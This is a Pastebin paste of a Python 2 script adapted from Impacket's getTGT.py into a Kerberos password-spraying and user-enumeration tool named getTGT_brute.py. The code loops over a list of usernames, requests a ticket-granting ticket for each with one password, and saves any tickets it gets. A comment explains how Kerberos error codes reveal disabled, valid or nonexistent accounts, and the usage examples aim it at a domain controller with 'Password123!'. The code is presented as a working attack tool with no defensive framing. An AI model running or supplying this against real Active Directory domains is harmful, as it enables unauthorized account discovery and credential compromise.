Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # Copyright (c) 2016-2018 CORE Security Technologies
- #
- # This software is provided under under a slightly modified version
- # of the Apache Software License. See the accompanying LICENSE file
- # for more information.
- #
- # Author:
- # Alberto Solino (@agsolino)
- #
- # Description:
- # Given a password, hash or aesKey, it will request a TGT and save it as ccache
- #
- # Examples:
- # ./getTGT.py -hashes lm:nt contoso.com/user
- #
- #
- import argparse
- import logging
- import sys
- from binascii import hexlify, unhexlify
- from impacket import version
- from impacket.examples import logger
- from impacket.krb5.kerberosv5 import getKerberosTGT
- from impacket.krb5 import constants
- from impacket.krb5.types import Principal
- class GETTGT:
- def __init__(self, target, password, domain, options):
- self.__password = password
- self.__user= target
- self.__domain = domain
- self.__lmhash = ''
- self.__nthash = ''
- self.__aesKey = options.aesKey
- self.__options = options
- self.__kdcHost = options.dc_ip
- if options.hashes is not None:
- self.__lmhash, self.__nthash = options.hashes.split(':')
- def saveTicket(self, ticket, sessionKey):
- logging.info('Saving ticket in %s' % (self.__user + '.ccache'))
- from impacket.krb5.ccache import CCache
- ccache = CCache()
- ccache.fromTGT(ticket, sessionKey, sessionKey)
- ccache.saveFile(self.__user + '.ccache')
- def run(self):
- try:
- userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
- tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
- unhexlify(self.__lmhash), unhexlify(self.__nthash), self.__aesKey,
- self.__kdcHost)
- self.saveTicket(tgt,oldSessionKey)
- except Exception as e:
- print('{}: {}'.format(userName,e))
- '''
- disableduser : KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) <-- disabled account
- validuser : Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid) <-- wrong password
- nonexistuser : Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) <-- group name or nonexistent user
- '''
- if __name__ == '__main__':
- # Init the example's logger theme
- logger.init()
- print version.BANNER
- parser = argparse.ArgumentParser(add_help=True, description="Given a password, hash or aesKey, it will request a "
- "TGT and save it as ccache")
- # parser.add_argument('identity', action='store', help='[domain/]username[:password]')
- parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
- group = parser.add_argument_group('authentication')
- group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
- group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
- group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
- '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
- 'ones specified in the command line')
- group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
- '(128 or 256 bits)')
- group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
- 'ommited it use the domain part (FQDN) specified in the target parameter')
- group.add_argument('-username', action='store',metavar = "username", help='username to use every time REALM/USERNAME')
- group.add_argument('-userlist', action='store',metavar = "user_list", help='user list to use for password spray')
- group.add_argument('-password', action='store',metavar = "password", help='password to pass along')
- group.add_argument('-passwordlist', action='store',metavar = "password_list", help='password list to use for password spray')
- group.add_argument('-domain', action='store',metavar = "domain", help='REALM value to use')
- if len(sys.argv)==1:
- parser.print_help()
- print "\nExamples: "
- print "\t./getTGT_brute.py -hashes lm:nt contoso.com/user\n"
- print "\t./getTGT_brute.py -domain CORP.DOMAIN.COM -username admin -password 'Password123!' -dc-ip 192.168.1.2\n"
- print "\t./getTGT_brute.py -domain CORP.DOMAIN.COM -userlist username_list.txt -password 'Password123!' -dc-ip 192.168.1.2\n"
- print "\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked"
- sys.exit(1)
- options = parser.parse_args()
- if options.debug is True:
- logging.getLogger().setLevel(logging.DEBUG)
- else:
- logging.getLogger().setLevel(logging.INFO)
- import re
- #domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::([^@]*))?)?').match(options.identity).groups(
- # '')
- domain = options.domain
- username = options.username
- password = options.password
- userlist = options.userlist
- passwordlist = options.passwordlist
- try:
- if domain is None:
- logging.critical('Domain should be specified!')
- sys.exit(1)
- if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
- from getpass import getpass
- password = getpass("Password:")
- if options.aesKey is not None:
- options.k = True
- if userlist is not None:
- lines = [line.rstrip('\n') for line in open(userlist)]
- for x in lines:
- executer = GETTGT(x, password, domain, options)
- executer.run()
- #executer = GETTGT(username, password, domain, options)
- #executer.run()
- except Exception, e:
- if logging.getLogger().level == logging.DEBUG:
- import traceback
- traceback.print_exc()
- print str(e)
Add Comment
Please, Sign In to add comment